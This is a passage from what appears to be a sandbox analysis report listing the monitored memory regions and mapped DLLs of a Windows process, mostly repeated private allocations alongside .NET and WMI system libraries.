"private_0x0000000005090000" filename = "" Region: id = 2203 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2204 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2205 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2206 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2207 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2208 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2209 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2210 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2211 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2212 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2213 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2214 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2215 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2216 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2217 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2218 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2219 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2220 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2221 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2222 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2223 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2224 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2225 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2226 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2227 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2228 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2229 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2230 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2231 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2232 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2233 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2234 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2235 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2236 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2237 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2238 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2239 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2240 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2241 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2242 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2243 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2244 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2245 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2246 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2247 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2248 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2249 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2250 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2251 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2252 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2253 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2254 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2255 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2256 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2257 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2258 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2259 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2260 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2261 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2262 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2263 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2264 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2265 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2266 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2267 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2268 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2269 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2270 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2271 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2272 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2273 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2274 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2275 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2276 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2277 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2278 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2279 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2280 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2281 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2282 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2283 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2284 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2285 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2286 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2287 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2288 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2289 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2290 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2291 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2292 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2293 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2294 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2295 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2296 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2297 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2298 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2299 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2300 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2301 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2302 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2303 start_va = 0x50b0000 end_va = 0x50bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050b0000" filename = "" Region: id = 2304 start_va = 0x50c0000 end_va = 0x50cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 2305 start_va = 0x50d0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 2306 start_va = 0x50e0000 end_va = 0x50effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 2307 start_va = 0x50f0000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 2308 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2309 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2310 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2311 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2312 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2313 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2314 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2315 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2316 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2317 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2318 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2319 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2320 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2321 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2322 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2323 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2324 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2325 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2326 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2327 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2328 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2329 start_va = 0x50a0000 end_va = 0x50affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 2330 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2331 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2332 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2333 start_va = 0x5090000 end_va = 0x509ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2334 start_va = 0x66d00000 end_va = 0x66e83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.csharp.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\4b4bc9f75377aaea11113089f0188e82\\Microsoft.CSharp.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.csharp\\4b4bc9f75377aaea11113089f0188e82\\microsoft.csharp.ni.dll") Region: id = 2335 start_va = 0x66b70000 end_va = 0x66cfcfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll") Region: id = 2336 start_va = 0x65f10000 end_va = 0x66b68fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll") Region: id = 2337 start_va = 0x65da0000 end_va = 0x65f0afff monitored = 0 entry_point = 0x65e0e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 2338 start_va = 0x5130000 end_va = 0x52affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2339 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2340 start_va = 0x5130000 end_va = 0x51effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2341 start_va = 0x52a0000 end_va = 0x52affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 2342 start_va = 0x5090000 end_va = 0x50cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005090000" filename = "" Region: id = 2343 start_va = 0x52b0000 end_va = 0x53affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 2344 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2345 start_va = 0x5130000 end_va = 0x516ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 2346 start_va = 0x51e0000 end_va = 0x51effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 2347 start_va = 0x53b0000 end_va = 0x54affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053b0000" filename = "" Region: id = 2348 start_va = 0x65d40000 end_va = 0x65d9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.dynamic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dynamic\\f7209dae192c8b5254852d8a975aed4e\\System.Dynamic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dynamic\\f7209dae192c8b5254852d8a975aed4e\\system.dynamic.ni.dll") Region: id = 2349 start_va = 0x54b0000 end_va = 0x55affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054b0000" filename = "" Region: id = 2350 start_va = 0x6c600000 end_va = 0x6c609fff monitored = 0 entry_point = 0x6c603200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2351 start_va = 0x65c20000 end_va = 0x65d3bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\d2f554a0c84513cd793fdcd77a86dab1\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\d2f554a0c84513cd793fdcd77a86dab1\\system.management.ni.dll") Region: id = 2352 start_va = 0x5170000 end_va = 0x51affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 2353 start_va = 0x55b0000 end_va = 0x56affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055b0000" filename = "" Region: id = 2354 start_va = 0x6d3c0000 end_va = 0x6d3c9fff monitored = 1 entry_point = 0x6d3c39f9 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wminet_utils.dll") Region: id = 2355 start_va = 0x50d0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 2356 start_va = 0x50d0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 2357 start_va = 0x50d0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 2358 start_va = 0x50d0000 end_va = 0x50d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050d0000" filename = "" Region: id = 2359 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2360 start_va = 0x50e0000 end_va = 0x50e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050e0000" filename = "" Region: id = 2361 start_va = 0x6cd90000 end_va = 0x6cdabfff monitored = 0 entry_point = 0x6cd9aa90 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 2362 start_va = 0x65bb0000 end_va = 0x65c16fff monitored = 0 entry_point = 0x65bcb610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2363 start_va = 0x6cd80000 end_va = 0x6cd8cfff monitored = 0 entry_point = 0x6cd83520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2741 start_va = 0x65b90000 end_va = 0x65ba0fff monitored = 0 entry_point = 0x65b98fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2742 start_va = 0x65ad0000 end_va = 0x65b8efff monitored = 0 entry_point = 0x65b01e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2743 start_va = 0x5100000 end_va = 0x5103fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 2826 start_va = 0x51b0000 end_va = 0x51b2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051b0000" filename = "" Region: id = 2827 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2828 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2829 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 2830 start_va = 0x51d0000 end_va = 0x51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051d0000" filename = "" Region: id = 2831 start_va = 0x51f0000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 2832 start_va = 0x5200000 end_va = 0x520ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 2833 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2834 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2835 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2836 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2837 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2838 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2839 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2840 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 2841 start_va = 0x51b0000 end_va = 0x51bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051b0000" filename = "" Region: id = 2842 start_va = 0x51c0000 end_va = 0x51cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 2843 start_va = 0x51c0000 end_va = 0x51d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000051c0000" filename = "" Region: id = 2844 start_va = 0x51f0000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000051f0000" filename = "" Region: id = 2845 start_va = 0x5200000 end_va = 0x520ffff monitored = 1 entry_point = 0x0 